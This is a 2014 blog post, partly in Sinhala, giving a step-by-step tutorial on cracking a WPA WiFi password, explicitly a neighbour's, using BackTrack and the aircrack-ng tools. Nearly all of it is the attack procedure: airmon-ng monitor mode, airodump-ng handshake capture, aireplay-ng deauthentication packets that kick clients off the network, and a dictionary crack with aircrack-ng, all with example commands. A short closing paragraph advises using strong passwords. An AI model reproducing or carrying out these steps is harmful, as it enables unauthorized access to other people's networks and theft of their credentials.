Posted by : cristiano Fans
Friday, October 10, 2014
අද අපි බලමු කොහොමද
මේ wifi hack (crack ) කරන්නේ කියලා මන් දැක්කා ඇරෝ සනා අහල තියෙනවා මේක
අපේ FB Group එකෙත් Group එකට Join වෙන්න කැමති නම් මෙතනින් ගිහින් Join වෙන්න.මේ post එකම කියවන්න කම්මැලි නම් පහලම තියන ටික කියවන්න එක වැදගත් වෙයි.....
Internet එකෙන් සල්ලි හොයමු Click Here
1st Step :
Now We know how to install backtrack in virtual box and basic back track command if don't know Learn here first start the back track and start the terminal.
2nd Step :
Next type airmon-ng as below screen.(wireless interface connect කරලා තියේ නම් ඒවා disconnect කරලා ඉන්න මේ command එක ගහන්න කලින්.)
You can see your Wireless interfaces after this command.
3rd Step :
Next type airmon-ng start wlan0 you can see below screen.if your wireless interface different than my one change use your wireless adepter name.
monitor mode enabled message mean that card has successfully been put into monitor mode and name mon0
4th Step :
Next issue airodump-ng mon0 you will see below screen.
There is the point to collect information about your neighbors wifi.copy BSSID and remember chanel.in my case Chanel 10.(මෙතැනදී අපි BSSID එකයි chanel එකයි හොයා ගන්නවා අපිට crack කරන්න ඕන wifi එකේ.මේ ටික අපිට ඊළඟට use කරන command එකටයි ඕන වෙන්නේ.)
5th Step :
Now we know information about wifi then we can stop airmon-ng using below command
airmon-ng stop mon0
6th Step :
Now type below command
airodump-ng –c [channel] –bssid [bssid] –w /root/Desktop/ [monitor interface]
example :
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0
(ඉස්සලා හොයා ගත්ත Chanel එකයි BSSID එකයි දාලා ඉහත command එක run කරන්න.)
When someone connect WiFi network you can grab wpa handshake information as below.
7th Step :
when running airodump-ng it's look like below.
Now airodump only
looking specific interface but we want to wait until another one
connect to WiFi then we force reconnect connected one using below
command.this command ( airplay-ng ) authentication ( deauth) packets to
the device.
Next Open New terminal window and type airplay-ng command
aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0
–0 is a short cut for the deauth mode
2 is the number of deauth packets to send
-a indicates the access point (router)’s bssid
-c indicates the clients BSSID
example:
aireplay-ng –0 2 –a 00:11:50:61:18:72 –c 58:55:CA:96:EE:84 mon0
Next you can see new handshake happen in On the airodump Terminal screen as bellow and that's complete handshake has been captured and *.cap file save to your Desktop.(* mean any name )
8th Step :
next you want to crack collected information using aircrack-ng command.we want word list for cracking back track and Kali Linux have word list file in below path
/pentest/passwords/wordlists/darkc0de.lst
Now Open a new Terminal, and type in this command: aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [path to your captured file]
example :
aircrack-ng –a2 –b 000:11:50:61:18:72 –w /pentest/passwords/wordlists/darkc0de.lst /root/Desktop/*.cap
Now press Enter
Aircrack-ng will now launch into the process of cracking the password like below.
password crack time depending in wordlist size and computer CPU RAM and other performance.
Finally you close to success destination like below
අපේ ආරක්ෂාවට :
මෙතැනදී අපි ඉගෙනගන්න ඕන wifi එකක් hack කරන්නම නෙමෙයි.අපේ තියන wifi එකක්
ආරක්ෂා කර ගන්නේ කොහොමද කියලත් ඉගෙන ගන්න ඕන මේක මේ crack කරද්දී use
කරන්නේ word list file එකේ තියෙන්නේ Dictionary word තමයි බොහෝ විට ඒ හන්දා
අපි password එකක් දාද්දි ඒ වචන නැතිව දන්නා පුළුවන් නම් හොඳයි.තවත් DOB
වගේ ලේසියෙන් crack වෙන password දාන්නත් හොඳ නෑ.එකට අපි කරන්න ඕන letters
symbol numbers එකතු කරලා හොඳ strong password එකක් දාන එක එතකොට මේ
Hackers ලා ගෙන් ආරක්ෂා වෙලා ඉන්න පුළුවන්.simple password එකක් දැම්මොත්
නම් බඩුම තමයි.මේ වගේ දේවල් දැනගෙන ආරක්ෂා වෙලා ඉන්න කැමති නම් මෙතනින් ගිහින් අපේ group එකට එකතු වෙන්න.එහෙනම් සුබ දවසක් හැමෝටම.


